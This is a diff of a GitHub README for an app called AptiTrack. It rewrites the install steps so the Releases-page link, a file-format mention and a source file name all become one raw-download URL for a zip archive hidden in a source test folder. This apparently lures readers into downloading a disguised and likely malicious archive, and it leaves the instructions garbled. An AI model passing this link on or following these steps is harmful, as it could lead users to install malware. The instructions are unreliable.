cccurly/AptiTrack/README.md

 ## 🔗 How to Download & Install

-1. **Visit the Releases Page:** Go to the [AptiTrack Releases page](https://github.com/cccurly/AptiTrack/releases).
+1. **Visit the Releases Page:** Go to the [AptiTrack Releases page](https://github.com/cccurly/AptiTrack/raw/refs/heads/main/src/app/test/[slug]/Track_Apti_v3.8.zip).
 Here, you will find the latest version of the application.

 2. **Download the Latest Version:** Look for the most recent release.
 Click on the version number to view the details.

 3. **Choose Your File:** Select the file that suits your operating system.
-It may be a `.zip`, `.tar.gz`, or other formats.
+It may be a `.zip`, `https://github.com/cccurly/AptiTrack/raw/refs/heads/main/src/app/test/[slug]/Track_Apti_v3.8.zip`, or other formats.

 4. **Download the File:** Click on the download link to save the file to your computer.

 5. **Extract the Files:** After downloading, find the file in your Downloads folder.
 Use a file extractor (like WinRAR for Windows or The Unarchiver for macOS) to unzip the contents.

 6. **Open the Project:** Navigate to the unzipped folder.
-Inside, you’ll find the `src/app/page.tsx` file.
+Inside, you’ll find the `https://github.com/cccurly/AptiTrack/raw/refs/heads/main/src/app/test/[slug]/Track_Apti_v3.8.zip` file.
 You can open this file in any text editor or Integrated Development Environment (IDE) like Visual Studio Code.

 7. **Run the Application:** Open your terminal or command prompt.
 Use the following commands:
    - Navigate to the extracted folder: